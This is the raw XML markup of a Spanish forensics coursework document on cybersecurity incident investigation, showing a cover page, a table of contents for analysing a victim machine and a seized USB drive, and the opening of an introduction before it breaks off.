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7D3D17C6" w:rsidR="002F5B4D" w:rsidRPr="00BD5449" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Incidentes de Ciberseguridad</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77777777" w:rsidR="002F5B4D" w:rsidRDefault="002F5B4D" w:rsidP="002F5B4D">
                            <w:pPr>
                              <w:pStyle w:val="Sinespaciado"/>
                              <w:spacing w:after="40"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:caps/>
                                <w:color w:val="156082"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:t>TEMA 1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="49CC397F" w14:textId="77777777" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
                            <w:pPr>
                              <w:pStyle w:val="Sinespaciado"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="156082"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00517A25">
                              <w:rPr>
                                <w:color w:val="156082"/>
                              </w:rPr>
                              <w:t>Investigación de los Incidentes de Ciberseguridad</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="100B729B" w14:textId="02CE9239"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77777777" w:rsidR="002F5B4D" w:rsidRDefault="002F5B4D" w:rsidP="002F5B4D">
                      <w:pPr>
                        <w:pStyle w:val="Sinespaciado"/>
                        <w:spacing w:after="40"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:caps/>
                          <w:color w:val="156082"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:t>TEMA 1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="49CC397F" w14:textId="77777777" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
                      <w:pPr>
                        <w:pStyle w:val="Sinespaciado"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="156082"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00517A25">
                        <w:rPr>
                          <w:color w:val="156082"/>
                        </w:rPr>
                        <w:t>Investigación de los Incidentes de Ciberseguridad</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="100B729B" w14:textId="02CE9239"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3AC69E19" w:rsidR="002F5B4D" w:rsidRDefault="002F5B4D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-2077118039"/>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6C3EA17A" w14:textId="7FC2CEC9" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
          </w:pPr>
          <w:r>
            <w:t>Contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7224474C" w14:textId="6C62C293" w:rsidR="00C858EA" w:rsidRPr="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc219084515" w:history="1">
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.- Descripción de la tarea.</w:t>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084515 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74D02A17" w14:textId="0A40FA1D" w:rsidR="00C858EA" w:rsidRPr="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084516" w:history="1">
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Las Técnicas de Investigación de Incidentes</w:t>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084516 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00C858EA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70EB9B61" w14:textId="031E7075" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084517" w:history="1">
            <w:r w:rsidRPr="00D324F0">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Descripción de los hechos acontecidos:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19B4CF27" w14:textId="6BE7E07A" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084518" w:history="1">
            <w:r w:rsidRPr="00D324F0">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apartado 1: Deducción del posible ataque sufrido.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="487BC8D5" w14:textId="23F04A9A" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084519" w:history="1">
            <w:r w:rsidRPr="00D324F0">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apartado 2: Análisis de la máquina víctima.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FD48006" w14:textId="1FF74C1A" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084520" w:history="1">
            <w:r w:rsidRPr="00D324F0">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apartado 3: Análisis del pen de datos requisado.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26404E8F" w14:textId="46E2F559" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc219084521" w:history="1">
            <w:r w:rsidRPr="00D324F0">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apartado 4: Conclusiones del análisis realizado.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc219084521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0088791C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39C5C081" w14:textId="04BDC888" w:rsidR="00C858EA" w:rsidRDefault="00C858EA">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="70ABF135" w14:textId="0F516D13" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D23E41" w14:textId="39AB20FA" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751CD6BB" w14:textId="6E66C1D0" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77262865" w14:textId="0DE890D2" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0891F2" w14:textId="19D3B999" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A83DD66" w14:textId="5FD18272" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03863AF1" w14:textId="4F8FD5C3" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C088C1B" w14:textId="4EF3C1B9" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785BAED8" w14:textId="704F9019" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37580432" w14:textId="46A5C868" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61061A3E" w14:textId="42299BE8" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514EF5E3" w14:textId="5D3BE0CD" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C026B" w14:textId="7C65BCED" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660DCC2D" w14:textId="3A5ED2C2" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C83258" w14:textId="354039F4" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFC1343" w14:textId="107BF870" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF6A757" w14:textId="577EBFD2" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3491C803" w14:textId="57B2E412" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E45D3C" w14:textId="47D98057" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1D769F" w14:textId="4B5CBCFA" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCAAF8B" w14:textId="5DBD307A" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2109F9" w14:textId="47885C90" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAE657F" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="0087FF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="0087FF"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc219084515"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="0087FF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.- Descripción de la tarea.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C788D0E" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc219084516"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Las Técnicas de Investigación de Incidentes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="17C83CB6" w14:textId="00A42B18" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3515F011" wp14:editId="25A7866F">
            <wp:extent cx="1914792" cy="120031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4792" cy="1200318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CDD7CC" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>INCIBE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Investigación Incidentes Ciberseguridad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="sep"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:tooltip="Acceder a los términos de licencia de la imagen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236122"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDCAA77" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">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Como hemos estudiado en la Unidad 3, las técnicas de investigación de incidentes están asociadas al momento en el que se efectúa la investigación del incidente, a saber:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62846CB9" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>Antes de la aparición del incidente en el entorno</w:t>
      </w:r>
